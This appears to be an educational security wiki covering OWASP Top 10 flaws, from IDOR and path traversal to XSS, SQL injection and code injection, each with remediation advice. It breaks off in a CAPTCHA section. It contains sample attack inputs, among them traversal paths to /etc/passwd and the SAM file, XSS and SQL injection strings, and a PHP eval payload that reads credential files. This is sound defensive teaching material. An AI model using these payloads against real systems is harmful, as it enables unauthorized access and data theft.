Welcome to Haxoris Wiki!

Haxoris Logo

Haxoris Wiki is your comprehensive resource for understanding the vulnerabilities detailed in your reports. Our goal is to provide clear and concise descriptions of each vulnerability, along with effective remediation strategies.

Whether you're a security professional, developer, or just someone interested in cybersecurity, Haxoris Wiki offers valuable insights into the world of vulnerabilities. Explore our chapters to learn more about each type of vulnerability and how to address them effectively.

Happy learning and stay secure!

WEB - OWASP TOP 10

The OWASP Top 10 is the gold standard for web application security, outlining the most critical security risks that modern applications face. Published by the Open Web Application Security Project (OWASP), this list is continuously updated to reflect the latest threats, attack techniques, and vulnerabilities that put businesses and users at risk. Whether you're a developer, security professional, or business owner, understanding these risks is essential to protecting your applications and data.

What’s in the OWASP Top 10?

The OWASP Top 10 highlights some of the most common and dangerous vulnerabilities, such as:

  • Injection Attacks – SQL, NoSQL, and command injection that allow attackers to manipulate databases and applications.
  • Broken Authentication – Weak authentication mechanisms that enable unauthorized access.
  • Security Misconfigurations – Improperly configured servers, frameworks, or apps that leave security holes open.
  • Vulnerable Components – Outdated libraries, plugins, or software dependencies that expose applications to attacks.

Each of these vulnerabilities presents a serious risk, and attackers actively exploit them to steal data, compromise systems, and gain unauthorized access.

How We Help You Stay Secure

We provide comprehensive information about the OWASP Top 10 vulnerabilities, including:

Description of each security risk.
Examples of how attackers exploit them.
Practical remediation strategies to fix and prevent vulnerabilities.

Our goal is to help developers, security engineers, and businesses strengthen their security posture by identifying and eliminating these threats before they can be exploited. Whether you're looking for technical deep dives or straightforward mitigation steps, our resources give you everything you need to build and maintain secure applications.

Stay ahead of attackers—understand and defend against the OWASP Top 10 today!

Broken Access Control

Broken Access Control is a critical security risk that occurs when applications fail to enforce proper authorization, allowing attackers to access, modify, or delete sensitive data and perform unauthorized actions. These vulnerabilities arise when restrictions on what authenticated users can do are not correctly implemented, leading to data breaches, privilege escalation, and system compromise. Attackers exploit these flaws by bypassing access controls through parameter manipulation, forced browsing, or privilege escalation techniques.

Common Vulnerabilities:

- Insecure Direct Object References (IDOR)
- Missing or Weak Authorization Checks
- Privilege Escalation (Horizontal & Vertical)
- Forced Browsing (Accessing Hidden Endpoints)
- Improper Session Handling
- Bypassing Access Controls via Parameter Manipulation

To mitigate these risks, applications should enforce role-based access control (RBAC), implement least privilege policies, validate permissions on every request, use secure indirect object references, and regularly test access controls to prevent unauthorized access.

Insecure Direct Object Reference (IDOR)

Description

Insecure Direct Object Reference (IDOR) is a type of access control vulnerability that occurs when an application directly uses user-supplied input to access internal objects (e.g., database entries, files, or other resources) without proper authorization checks. In other words, the application references an object (like a record in a database) by a parameter (for instance, a numeric ID) that a user can manipulate. If there is no robust mechanism to verify that the user has permission to access or modify that particular object, the door is left open for attackers to escalate privileges or view and edit data they should not have access to.

IDOR often stems from insufficient or missing access control logic. Applications may assume that if someone has a valid session or is already authorized at a certain level, all object references they provide must be valid for them. This assumption fails when attackers deliberately change parameters and gain access to resources belonging to other users or system records that should be restricted.

Examples

Changing User Account IDs

Suppose a web application profile management page uses a URL like:

https://example.com/user/profile?id=12345

The application retrieves user details for the user with ID 12345 and displays them. If there is no verification that the logged-in user actually owns or has the right to access user 12345's data, an attacker could change this parameter to another ID:

https://example.com/user/profile?id=67890

Potentially revealing or allowing edits to another user's profile.

Direct File Reference

An application might store documents in a system accessible by references like:

https://example.com/documents?file=invoice_12345.pdf

If the application fails to validate ownership or permissions, a malicious user could modify the file name parameter to access another user's file, e.g.:

https://example.com/documents?file=invoice_67890.pdf

They might gain access to sensitive information, violating data privacy and confidentiality.

Elevation of Privileges

In some advanced IDOR scenarios, attackers may also manipulate object references to escalate privileges. For instance, changing a role ID or user group ID within a request that updates account data could grant admin-level access if the application does not validate permissions.

Remediation

  1. Implement Strict Access Control Checks

    • Always validate that the current user is authorized to access or modify the specific resource.
    • Access control logic should be performed server-side, not solely in client-side code or session variables.
  2. Use Indirect References

    • Instead of exposing internal identifiers (e.g., database keys or sequential IDs), map them to unique tokens or opaque references.
    • This prevents attackers from guessing internal resource IDs and eliminates direct object references in user-visible parameters.
  3. Parameter Validation

    • Where direct IDs are necessary, perform checks to confirm that the resource requested belongs to the current user (or that the user has the correct privileges for that resource).
    • Do not rely on hidden form fields or client-side mechanisms for validation—these can be tampered with.
  4. Secure Coding Practices

    • Adopt frameworks and libraries that provide built-in access control mechanisms.
    • Follow the principle of least privilege, granting each user or role only the minimum permissions needed to perform their actions.

Local File Inclusion (LFI)

Description

Local File Inclusion (LFI) is a type of security vulnerability that occurs when a web application includes files on the server without properly validating user input. In most cases, the application receives a file path from a client-side parameter (for example, ?page= in a URL) and dynamically uses this path to include content in the response. If the application does not adequately sanitize or validate that path, attackers can manipulate it to access sensitive files on the host system.

The core issue arises from user input being passed into file handling functions (e.g., include, require in PHP, file reads in other languages) that treat that input as a trusted file path. By leveraging path traversal sequences such as ../, an attacker might be able to read arbitrary files on the server (like system logs, configuration files containing credentials, or even application source code).

LFI can escalate into more severe attacks if attackers manage to include and parse files that contain malicious code or user-submitted content. In some scenarios, LFI can lead to Remote Code Execution (RCE), but even when limited to file reads, it can expose critical information, facilitate further attacks, and compromise privacy.

Examples

Simple Path Traversal

// Vulnerable code snippet
<?php
    $page = $_GET['page'];  // For example, ?page=index
    include($page);         // No input validation
?>

An attacker could exploit this by passing:

?page=../../../../etc/passwd

attempting to read the server's /etc/passwd file (if permissions allow).

Log File Inclusion Leading to Code Execution

Some applications write user input to server logs. If an attacker can write PHP code into a log (for instance, by manipulating the User-Agent header) and then include that log file via the vulnerable parameter, the PHP code can be executed.

Example request:

GET /vulnerable.php?page=../../../var/log/apache/access.log

where the log file might contain malicious code that the server interprets.

Commonly Targeted Files:

  • /etc/passwd or /etc/shadow on UNIX systems.
  • config.php or wp-config.php in web application directories (leaking database credentials).
  • Error logs or access logs that may contain other exploitable information or even injected malicious code.

These examples highlight how an attacker can leverage unvalidated file inclusion to read system files or escalate the impact through file injection.

Remediation

  1. Input Validation and Whitelisting

    • Never trust user-supplied paths.
    • Maintain an explicit whitelist of allowable file names or paths if dynamic includes are necessary. For example, map user-friendly input values (?page=help) to internal, verified file names (/path/to/help.php).
  2. Parameterized Routing / Avoid Direct include

    • Rather than accepting file paths directly, use a controlled routing mechanism. For example, store all legitimate include files in a single directory and use a lookup table.
    • If a legitimate file must be included, ensure its path is strictly verified (e.g., using realpath checks or directory checks).
  3. Least Privileges and Hardened Server Configuration

    • Limit file system permissions so that the web application user has only the minimum necessary access. This reduces the impact if a vulnerability is exploited.
    • Disable risky functions (like allow_url_include or even allow_include in some configurations) in the PHP settings when not needed.
    • Consider using open_basedir restrictions in PHP to confine file operations to specific, safe directories.
  4. Filtering and Encoding

    • Remove or encode special characters from user input (e.g., ../) that enable path traversal.
    • In some cases, implementing stringent filtering can reduce exposure to LFI attacks, though whitelisting is typically more secure than blacklisting.

Directory Traversal

Description

Directory Traversal (also referred to as Path Traversal) is a security vulnerability that allows attackers to access files or directories outside the intended scope of the web application's file system. This typically occurs when user input specifying a file path is not properly validated or sanitized. Attackers exploit this by inserting special directory traversal characters (e.g., ../) to climb up the directory tree and reveal sensitive system files or application data.

Directory Traversal is often seen in scenarios where applications allow users to download or view files by passing a file name or path as a parameter. If the application's back-end logic simply appends user-provided input to a base directory without further checks, malicious actors can manipulate this path to break out of the expected directory structure. Consequences include unauthorized reading of server files, exposure of credentials, or further exploitation of the host machine.

Directory Traversal vs. Local File Inclusion (LFI)

Directory Traversal lets attackers access arbitrary files by navigating outside intended directories (e.g., /etc/passwd). Local File Inclusion (LFI) allows inclusion of local files in web applications, potentially leading to code execution. While both expose sensitive data, LFI can be more dangerous if exploited for execution.

Examples

Simple ../ Attack

An application might allow users to specify a filename via a URL parameter:

https://example.com/getFile?name=report.pdf

If the server code concatenates name with a directory path, for example "/var/www/files/" + name, and does not sanitize the input, an attacker could send:

https://example.com/getFile?name=../../etc/passwd

This might expose the content of /etc/passwd (if permissions allow), providing sensitive information about user accounts on the server.

Windows Environments

On Windows servers, directory traversal often uses backslashes (..\) instead of forward slashes. For instance:

https://example.com/getFile?name=..\\..\\Windows\\System32\\config\\SAM

which could reveal critical system registry data under certain conditions.

Chained with Other Vulnerabilities

Directory Traversal vulnerabilities can sometimes be chained with other attacks:

  • Local File Inclusion (LFI): An attacker can leverage path traversal in an LFI scenario to include sensitive files in the application's output or potentially execute scripts.
  • Log File Poisoning: If an application allows manipulation of file paths and logs, an attacker may inject malicious content into logs and then retrieve or execute that content via directory traversal.

Remediation

  1. Strict Input Validation and Sanitization

    • Remove or encode any directory traversal sequences (e.g., ../ or ..\) from user inputs.
    • Restrict file names to alphanumeric characters and whitelisted file extensions when possible.
  2. Use Secure File Handling Mechanisms

    • Rely on server-side logic that enforces a predefined file directory or store allowed file references in a secure mapping.
    • Avoid passing raw user input directly into file system calls. Instead, map user-requested filenames to verified internal paths.
  3. Enforce Least Privilege and Directory Restrictions

    • Run the application with the minimum privileges necessary.
    • Configure your web server and file system so that the application process has access only to the directories it needs. For instance, use mechanisms like chroot jails, SELinux policies, or Docker containers to confine the application's file system access.
  4. Use Built-In Security Features

    • If your programming language or framework offers built-in file handling functions with path normalization or sandboxing, leverage them.
    • For instance, in Java, java.nio.file.Files and java.nio.file.Paths can help normalize paths and reduce the risk of directory traversal.

Authorization Bypass

Description

Authorization Bypass is a security flaw in which an application fails to properly enforce permissions, allowing attackers to access resources or perform actions they should not be permitted to. It typically stems from weak or incomplete access control logic. Even though a user may not be authenticated with the correct privileges, they can bypass certain checks (such as direct link guessing, parameter manipulation, or improper session validation) to reach restricted areas or execute restricted functions. In some cases, developers assume client-side or partial checks are sufficient, leaving server-side routes or endpoints unprotected.

Authorization Bypass can have serious consequences, including unauthorized data access, privilege escalation, tampering with sensitive records, or performing administrative actions that compromise the entire application.

Examples

Direct URL Access

An application has administrative pages only meant for admin roles, for instance:

https://example.com/admin/dashboard

If the server does not verify the user's role when they request the /admin/dashboard path, a non-admin user (or even an unauthenticated visitor) might access it directly by entering the URL in a browser.

Parameter Manipulation

Suppose a request includes a parameter specifying the user role or account type:

 POST /updateUser
 Role: user

If the application accepts a modified request such as:

 POST /updateUser
 Role: admin

without verifying the user's actual permissions on the server side, an attacker could escalate privileges and gain administrator-level capabilities.

Skipping Steps in Multi-Step Processes

Some workflows (e.g., e-commerce checkout or registration) use sequential steps enforced on the client side (e.g., step=1, step=2). An attacker could jump directly to the final step or a restricted step by altering the URL or parameters, bypassing required checks if the server does not maintain strict, step-by-step session validation.

Remediation

  1. Enforce Robust Access Control

    • Implement comprehensive server-side checks for each resource, function, or endpoint.
    • Define clear role-based or permission-based access policies and verify permissions for every request, not just at login or on the client side.
  2. Prevent Parameter Tampering

    • Never rely on hidden fields, cookies, or client-side scripts as the sole means of determining user privileges.
    • Validate any user input against expected values and confirm that the request matches the privileges assigned to the user's session on the server side.
  3. Secure Routing and Endpoint Protection

    • Restrict direct URL access by mapping endpoints to authorized roles.
    • Use a centralized mechanism for permission checks (e.g., middleware, filters) within your framework so the logic is consistent and cannot be bypassed in individual controllers or routes.
  4. Session Management and Integrity

    • Ensure session tokens map to user permissions on every request.
    • Protect session tokens from theft or replay attacks through secure cookies, HTTP-only flags, and encryption as needed.

Cryptographic Failures

Cryptographic Failures occur when sensitive data is not properly protected using encryption, hashing, or secure key management. This can lead to data exposure, unauthorized access, and integrity breaches, especially when weak encryption algorithms, improper key storage, or plaintext data transmission are involved. Attackers exploit these weaknesses to steal credentials, decrypt confidential information, or manipulate encrypted data.

Common Vulnerabilities:

- Use of Weak or Deprecated Cryptographic Algorithms (MD5, SHA-1, DES, RC4)
- Storing Sensitive Data Without Encryption
- Transmission of Data Over Unencrypted Channels (Missing HTTPS/TLS)
- Insecure or Hardcoded Cryptographic Keys
- Lack of Proper Key Management (Reusing or Exposing Keys)
- Improper Implementation of Encryption (Weak Initialization Vectors,
  ECB Mode Usage, Broken Padding)

To mitigate these risks, applications should use strong encryption standards (AES-256, SHA-256, TLS 1.2+), enforce HTTPS for all data transmission, securely store and rotate cryptographic keys, and follow best practices for hashing passwords (bcrypt, Argon2, PBKDF2). Regular security audits and compliance checks should also be conducted to ensure cryptographic integrity.

SSL/TLS Misconfiguration

Description

SSL/TLS Misconfiguration is a broad category of security issues arising when a web server's Secure Sockets Layer (SSL) or Transport Layer Security (TLS) protocols are set up improperly. This includes using outdated protocol versions (such as SSLv3 or early TLS versions), weak or deprecated cipher suites, and incorrect certificate management.

When the TLS setup is not secure, attackers may intercept or tamper with data transmitted between a client and the server. Potential risks include Man-in-the-Middle (MitM) attacks, session hijacking, or exposure of sensitive information. Misconfiguration often arises from default settings, a lack of updates, or improper handling of certificates and keys.

Examples

Use of Deprecated Protocol Versions

Legacy versions like SSLv2, SSLv3, or older TLS (e.g., TLS 1.0) have known vulnerabilities (e.g., POODLE, BEAST). If these protocols remain enabled on the server, an attacker might force a downgrade or exploit those weaknesses to decrypt or modify traffic.

Weak or Insecure Cipher Suites

Even if a modern TLS protocol is in use (e.g., TLS 1.2 or 1.3), misconfiguring the cipher suites can allow connections to occur with RC4, 3DES, or other weak algorithms. Attackers can take advantage of known flaws in those ciphers to compromise the confidentiality or integrity of the data.

Incorrect Certificate Configuration

Common certificate configuration issues include:

  • Self-Signed Certificates: Not trusted by browsers or other clients, leading to warnings or the possibility of an attacker substituting their own certificates.
  • Expired Certificates: Causes errors in client applications and could open the door for MitM attacks if users disregard warnings.
  • Mismatched Hostnames: Certificates not matching the domain name can confuse clients and be exploited by attackers.

Remediation

  1. Enforce Strong TLS Protocols
  • Disable SSLv2, SSLv3, and older TLS versions such as TLS 1.0 and 1.1.
  • Use at least TLS 1.2, and if possible, adopt TLS 1.3 for improved security and performance.
  1. Restrict Cipher Suites
  • Remove weak ciphers such as RC4, 3DES, or those with insufficient key lengths.
  • Prefer modern cipher suites that support forward secrecy (e.g., ECDHE) and strong encryption (e.g., AES-GCM).
  1. Proper Certificate Management
  • Obtain certificates from trusted Certificate Authorities (CAs).
  • Renew certificates before they expire and ensure the domain name (Common Name or Subject Alternative Name) exactly matches your website's address.
  • Store private keys securely and avoid publicly exposing them (e.g., in source repositories).
  1. Implement Strict Transport Security
  • Enable HTTP Strict Transport Security (HSTS) to force browsers to use secure connections only and protect against downgrade attacks.
  • Configure appropriate preload and max-age settings to provide continuous coverage.
  1. Regular Audits and Testing
  • Use SSL/TLS scanning tools (like openssl, nmap, or other specialized scanners) to verify protocol configurations and cipher suite strength.
  • Regularly patch and update server software to apply the latest security patches and recommended configurations.

HTTP Strict Transport Security (HSTS)

Description

HTTP Strict Transport Security (HSTS) is a security policy mechanism that helps protect websites against protocol downgrade attacks and cookie hijacking. When a server includes an HSTS header (Strict-Transport-Security) in its response, it instructs compliant browsers to only connect to that site using HTTPS for a specified period of time. As a result, any subsequent visits—whether initiated by the user, a script, or a redirect—will occur over HTTPS, effectively preventing users from mistakenly making insecure HTTP connections.

HSTS improves overall transport security by discouraging the use of vulnerable plain-text connections. It also helps protect against attacks such as SSL stripping, where an attacker might intercept communications and downgrade the connection to HTTP without the user noticing.

Examples

Basic HSTS Header

A simple example of the Strict-Transport-Security header might look like this:

Strict-Transport-Security: max-age=31536000

Here, 31536000 seconds equals one year. This instructs the browser to remember the requirement to only use HTTPS for the next 365 days. If a user or script attempts to connect via HTTP, the browser automatically upgrades the connection to HTTPS, bypassing an insecure request.

Preload Directive

Some sites add the includeSubDomains and preload directives:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  • includeSubDomains applies the HSTS policy to all subdomains, ensuring they also enforce secure connections.
  • preload is used by browsers that maintain a preloaded list of HSTS sites. Once a domain is accepted into the preload list, browsers will force HTTPS even for first-time visits, eliminating the possibility of a first unsecure request.

Remediation

  1. Serve All Traffic Over HTTPS
    • Ensure you have a valid TLS certificate configured for your domain.
    • Redirect all HTTP requests to the HTTPS version of the site before or as you implement HSTS.
  2. Set Appropriate HSTS Header
    • Decide on a sufficient max-age value (commonly at least 31536000 seconds or 1 year).
    • Consider using includeSubDomains to cover subdomains.
    • Apply preload only if you are confident all subdomains use HTTPS and you intend to submit your domain to browser preload lists.
  3. Incremental Rollout
    • If you are unsure about the readiness of subdomains, start with a smaller max-age and without includeSubDomains.
    • Gradually increase max-age and then add includeSubDomains as you gain confidence that every part of your infrastructure is TLS-secure.

Injection

Injection occurs when an attacker is able to insert malicious input into an application, causing it to execute unintended commands or queries. This vulnerability arises when user input is improperly handled, allowing attackers to manipulate databases, operating systems, or other backend services. Injection attacks can lead to data breaches, unauthorized access, remote code execution (RCE), and full system compromise.

Common Vulnerabilities:

- SQL Injection (SQLi) – Manipulating database queries
- Command Injection – Executing system commands
- Cross-Site Scripting (XSS) – Injecting malicious scripts in web pages
- LDAP Injection – Manipulating directory service queries
- NoSQL Injection – Exploiting NoSQL databases like MongoDB
- XML Injection (XXE) – Exploiting XML parsers to read local files
- Email Header Injection – Modifying email headers to send spam or phishing emails

To mitigate these risks, applications should use parameterized queries (prepared statements), validate and sanitize user input, escape special characters, enforce content security policies (CSP), and implement least privilege access for backend services. Regular security testing, including automated scans and manual penetration testing, is essential to detect and prevent injection vulnerabilities.

Stored Cross-Site Scripting (XSS)

Description

Stored Cross-Site Scripting (XSS) occurs when a web application accepts user-provided data, stores it on the server (e.g., in a database or file system), and later includes that data within the rendered response without proper output encoding or sanitization. Unlike reflected XSS, where the malicious payload is part of the request and reflected immediately, stored XSS persists on the server side. As a result, any user visiting the affected page (or component) can be silently exposed to the malicious script.

Because the malicious payload is persistent, stored XSS can be more dangerous. It can affect multiple users over time, enabling attackers to steal credentials, hijack sessions, spread malware, or perform unauthorized actions on behalf of victims.

Examples

Inserting Malicious Content in a Comment Field

An attacker posts a comment containing a malicious script on a public forum or blog:

<script>alert('Stored XSS');</script>

If the server stores this comment in a database and later displays it without proper encoding or filtering, every visitor viewing the comment sees the script executed in their browser.

Injecting Scripts in User Profiles

In social networking or user management systems, an attacker might edit their profile (e.g., name or about section) to include harmful JavaScript:

<b onmouseover="alert('Hacked!')">Hover Here</b>

If the application returns that raw HTML to other users—perhaps in a user directory or profile view—they will unintentionally trigger the malicious script when they hover over or load the attacker's profile.

Embedded Scripts in Uploaded Files

Even if a file is not obviously a script, certain formats (like SVG images or PDF documents) can contain executable content. If an attacker uploads a seemingly benign file, but it includes embedded scripts, and the application renders or interprets it in the browser without validation, this can lead to stored XSS.

Remediation

  1. Validate and Sanitize User Input

    • Apply strict validation on all user inputs, especially those destined for storage (e.g., comments, profile fields).
    • Use robust libraries or frameworks designed to handle HTML sanitization (e.g., DOMPurify for JavaScript) to remove or neutralize malicious scripts.
  2. Encode Output Properly

    • Always encode dynamic data before injecting it into HTML pages (e.g., HTML-escaping, JavaScript-string escaping).
    • Follow a context-aware encoding strategy. For instance, values placed in HTML text nodes need HTML encoding, while values inside JavaScript variables require JavaScript string escaping.
  3. Use Content Security Policy (CSP)

    • Deploy a strong Content Security Policy that restricts script execution sources to trusted domains.
    • Consider using CSP directives like script-src, object-src, and default-src to block inline scripts or unauthorized external sources.
  4. Implement Proper Access Controls

    • Restrict which users can upload files or post HTML content, and limit the type of content they can include.
    • Perform server-side checks and moderate or approve user-generated content if the application is highly exposed (e.g., public forums).

Reflected Cross-Site Scripting (XSS)

Description

Reflected Cross-Site Scripting (XSS) occurs when an attacker injects malicious code into a vulnerable field or parameter, and that code is immediately included in the subsequent response without being stored on the server. Unlike stored XSS, which persists in the application's database or file system, reflected XSS is transient. The malicious payload is typically part of a crafted URL or form submission that a victim must click or visit.

Because the injected script executes in the context of the victim's browser, it can steal session cookies, hijack accounts, or perform actions on behalf of the victim. Reflected XSS heavily relies on social engineering: attackers must entice or trick users into clicking a specially crafted link or submitting malicious data.

Examples

Malicious Query Parameter

An application includes user-submitted input directly into the response. For instance, a search form:

https://example.com/search?q=someinput

If the server-side code incorporates someinput into the HTML page without proper escaping, an attacker can craft a URL with a malicious script:

https://example.com/search?q=<script>alert('XSS')</script>

When a victim clicks this link, the browser executes the script in the page context.

Form Fields in GET/POST Requests

If a web form takes user data from a POST request and displays it on the page (e.g., an error message or confirmation) without sanitization, an attacker can submit a malicious payload:

<script>alert('Reflected XSS');</script>

The response then reflects this script, causing the browser to run it whenever the victim views the result page.

Remediation

  1. Validate and Sanitize User Input
    • Filter out or neutralize dangerous characters or HTML tags.
    • Use well-maintained libraries or frameworks that handle HTML sanitization and escaping for your language of choice.
  2. Encode Output Correctly
    • Escape all dynamic content when rendering in HTML, JavaScript, or other contexts.
    • For instance, use HTML encoding for data placed in HTML text nodes, and JavaScript encoding for data placed in scripts.
  3. Implement a Content Security Policy (CSP)
    • Configure script-src, object-src, and other directives to restrict script execution.
    • This adds a strong layer of defense if an XSS vector is discovered.
  4. Use Server-Side Security Libraries and Frameworks
    • If your framework supports auto-escaping or context-sensitive encoding, enable it by default.
    • Avoid crafting raw HTML strings by concatenating user input; instead, use templating systems that are XSS-aware.

DOM-based Cross-Site Scripting (XSS)

Description

DOM-based Cross-Site Scripting (XSS) is a variant of XSS where the entire exploit occurs in the Document Object Model (DOM) within the victim's browser, without sending malicious data to the server. In DOM-based XSS, the vulnerability arises when client-side scripts (e.g., JavaScript) read or write to the DOM using insecure methods (such as document.location, document.write, or innerHTML) with untrusted data. As a result, attackers can manipulate the browser environment to inject and execute malicious code directly.

Because the payload never reaches the server (or is not processed by the server in a vulnerable way), traditional server-side filters and firewalls may fail to detect or block it. DOM-based XSS can be harder to trace and mitigate if developers do not inspect client-side logic carefully.

Examples

Insecure DOM Manipulation

Consider a script that reads a parameter from the URL and sets it as HTML content:

// Example of an insecure snippet
let userParam = new URLSearchParams(window.location.search).get('text');
document.getElementById('output').innerHTML = userParam;

If an attacker crafts a URL like:

https://example.com/page?text=<script>alert('DOM XSS');</script>

the script will inject the untrusted HTML directly into the page's DOM, executing the attacker's payload.

Using location.hash

In single-page applications, developers often store state or data in the URL hash. If a script directly injects the hash value into the DOM, an attacker can pass malicious code in the hash fragment:

// Reading window.location.hash and directly rendering it
let hashContent = window.location.hash.substring(1); // e.g. '#<script>...</script>'
document.getElementById('hashOutput').innerHTML = decodeURIComponent(hashContent);

Anyone visiting a link with a crafted hash (e.g., https://example.com/#%3Cscript%3Ealert('XSS')%3C/script%3E) would execute the attacker's injected script.

Remediation

  1. Safe DOM Manipulation Methods
    • Use APIs that automatically treat user data as text rather than HTML. For instance, use textContent instead of innerHTML.
    • Avoid dynamic insertion of HTML where possible. If absolutely necessary, use robust sanitization libraries (e.g., DOMPurify) to remove dangerous elements.
  2. Proper Encoding and Escaping
    • When setting content in the DOM, ensure it is properly escaped for the appropriate context.
    • For example, if injecting into an HTML context, HTML-encode special characters to prevent script execution.
  3. Validate and Sanitize Input
    • Although DOM-based XSS bypasses the server, validating and restricting the format of query parameters or hash fragments on the client side can reduce malicious opportunities.
    • Use regular expressions, built-in parsers, or sanitization routines to filter out disallowed characters or code.
  4. Content Security Policy (CSP)
    • A well-configured Content Security Policy can reduce the risk of script injection even if some DOM-based vulnerabilities exist.
    • For instance, disallow inline scripts and only allow scripts from trusted sources to limit the effect of malicious injections.

SQL Injection (SQLi)

Description

SQL Injection is a critical web application vulnerability where attackers manipulate user input to alter SQL queries sent to a database. By inserting or "injecting" malicious SQL statements into input fields, attackers can access or modify data far beyond their intended privileges. In severe cases, SQL Injection can lead to complete database compromise, data exfiltration, or even system-level access if the database is integrated with other server components.

This vulnerability typically arises when user input is concatenated directly into a query string without proper sanitization or parameterization. Applications that rely on string manipulation to build SQL statements are especially prone to SQL Injection if they fail to validate and escape user inputs.

Examples

Basic Injection Through Form Input

A typical vulnerable login query might look like this in pseudocode:

SELECT * FROM users WHERE username = 'USER_INPUT' AND password = 'USER_INPUT';

If the application simply places the user's input into the query, an attacker can inject special characters:

  • Username: admin'--
  • Password: anything

Which results in a query:

SELECT * FROM users WHERE username = 'admin'--' AND password = 'anything';

The -- comment syntax causes the password check to be ignored, potentially granting unauthorized access if the record for "admin" exists.

UNION-Based Injection

Attackers can also use the UNION keyword to fetch data from other tables. For example, if the application runs:

SELECT name, email FROM users WHERE id = '$ID';

An attacker might provide a parameter like:

1 UNION SELECT credit_card_number, security_code FROM creditcards

leading to a query:

SELECT name, email 
FROM users 
WHERE id = '1 UNION SELECT credit_card_number, security_code FROM creditcards';

Depending on error messages or the way results are rendered, the attacker may extract sensitive data, such as credit card numbers or other protected fields.

Error-Based Injection

Some databases and configurations return error messages revealing detailed SQL engine responses. Attackers can use these messages to refine their injection attempts and glean information about the database schema:

?id=1'

If the server responds with a syntax error mentioning table or column names, the attacker can adjust the query systematically to discover the structure of the database and plan further injections.

Remediation

  1. Use Parameterized Queries (Prepared Statements)

    • Leverage parameterized queries in your application code to ensure user input is treated strictly as data rather than executable SQL.
    • Most modern libraries (e.g., PDO in PHP, PreparedStatement in Java, parameterized queries in .NET or Python) provide robust support for secure query parameterization.
  2. Input Validation and Escaping

    • Validate user input against expected formats (e.g., numeric IDs, specific character sets) before sending to the database.
    • Use context-appropriate escaping for any dynamic SQL components that cannot be avoided (e.g., table names in some dynamic queries).
  3. Least Privilege Principle

    • Configure the database account used by the application to have only the necessary permissions (SELECT, UPDATE on specific tables).
    • Avoid using database accounts with root or admin privileges for routine application queries.
  4. Secure Error Handling

    • Do not display detailed SQL errors or stack traces to end-users.
    • Log detailed errors server-side for debugging but show generic error messages on the client side.

Code Injection

Description

Code Injection is a critical security flaw where an attacker can supply malicious input that the application interprets or executes as code. This occurs in scenarios where user-controlled data is passed to language interpreters, eval functions, or dynamic execution contexts without proper validation or sanitization. By exploiting a code injection vulnerability, attackers can potentially execute arbitrary commands or manipulate the server, gaining full control over the affected application or even the underlying system.

Unlike SQL Injection (focused on databases) or Command Injection (targeting system commands), Code Injection refers specifically to injecting code in the same language as the application runtime (for example, Python, PHP, Ruby, or others). When the server executes the malicious code, attackers can perform unauthorized actions, access sensitive data, or escalate privileges.

Examples

eval() in JavaScript or PHP

A common pattern that leads to Code Injection is the use of eval():

<?php
    // Insecure PHP snippet
    $userInput = $_GET['data'];
    eval("\$variable = $userInput;");
?>

If an attacker passes something like:

?data=system('cat /etc/passwd');

the eval() function attempts to execute the injected code in PHP. Depending on configuration, this could lead to arbitrary command execution or file disclosure.

Unsafe Deserialization

Languages that support serialization (e.g., Java, PHP, Python) can be vulnerable if untrusted data is deserialized without checks. Attackers can craft a malicious serialized payload that, upon deserialization, executes arbitrary code or triggers dangerous application logic. For example, in PHP:

<?php
    // Insecure example of unserializing user data
    $serializedData = $_POST['serialized'];
    $object = unserialize($serializedData);
    // Potentially triggers malicious constructors or methods
?>

If the serialized object contains malicious classes or triggers magic methods, it could lead to code execution within the application.

Template Injection Leading to Code Execution

In some server-side template engines (e.g., Jinja2 in Python, Twig in PHP), an attacker might inject syntax recognized by the template engine, enabling them to execute server-side code. For instance:

# Vulnerable Python with Jinja2
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route('/')
def index():
    user_input = request.args.get('data')
    template = f"Hello {user_input}!"
    return render_template_string(template)

If render_template_string processes certain Jinja2 constructs without sandboxing, an attacker could supply a payload like:

/?data={{7*7}} or {% if ''.__class__.__mro__[1].__subclasses__()%}...

leading to arbitrary code execution on the server through Python object references.

Remediation

  1. Avoid Insecure Code Evaluation
    • Eliminate or severely restrict the use of functions like eval(), exec(), or similar dynamic code execution methods.
    • If dynamic evaluation is absolutely necessary, strictly validate or sanitize the input beforehand, and consider sandboxing techniques.
  2. Safe Deserialization
    • Avoid deserializing untrusted user input.
    • If deserialization is required, use known-safe formats (e.g., JSON) and verify that the data conforms to expected structures.
    • Use libraries that have built-in safety checks or implement custom validation of deserialized objects.
  3. Use Secure Templating
    • Employ templating systems that automatically escape user inputs and sandbox any code-like expressions.
    • Disallow direct access to critical objects or methods within template contexts.
  4. Input Validation and Sanitization
    • Treat all user-supplied data as untrusted.
    • Validate against expected formats (e.g., numeric ranges, string length constraints) and strip or encode dangerous characters.
    • Use context-appropriate encoding if user input will be inserted into a dynamic execution environment.
  5. Principle of Least Privilege
    • Run the application with the minimum privileges required.
    • Even if Code Injection occurs, restricting privileges reduces the impact—limiting file system access, network capabilities, or system-level actions.

Insecure Design

Insecure Design refers to flaws in an application's architecture or logic that create security weaknesses, making it vulnerable to attacks. Unlike implementation bugs, these issues stem from poor security planning, lack of threat modeling, or failing to enforce security principles at the design stage. Insecure design can lead to data exposure, authentication bypasses, privilege escalation, and business logic abuses.

Common Vulnerabilities:

- Lack of Threat Modeling and Security Review in the Development Process
- Missing or Weak Authentication and Authorization Mechanisms
- Flawed Business Logic That Enables Abuses (e.g., bypassing payment verification)
- Inadequate Data Protection Strategies (e.g., storing sensitive data in plaintext)
- Improper Separation of Privileges or Over-Permissioned Accounts
- Lack of Security Controls for API Rate Limiting and Abuse Prevention

To mitigate these risks, applications should incorporate security best practices from the design phase, enforce strong authentication and authorization controls, apply the principle of least privilege, conduct threat modeling, and implement secure coding guidelines. Regular security reviews and testing should be performed to identify and fix architectural flaws before deployment.

CAPTCHA Bypasses

Description

A CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is designed to differentiate legitimate users from automated scripts or bots. However, many CAPTCHA implementations can be bypassed through weaknesses in their design, logic, or integration. Attackers exploit these vulnerabilities to automate form submissions, create fake accounts, or conduct bulk actions without being stopped by the CAPTCHA challenge.

These bypasses often arise from straightforward technical flaws, such as predictable CAPTCHA tokens, insufficient validation on the server side, or reliance on client-side checks. Additionally, more sophisticated attacks may leverage machine learning-based optical character recognition (OCR) or "human-in-the-loop" methods (like paying services or using mechanical turks) to solve CAPTCHAs at scale.

Examples

Predictable or Reusable Tokens

Some CAPTCHAs generate a token or session ID that remains valid for too long or can be replayed:

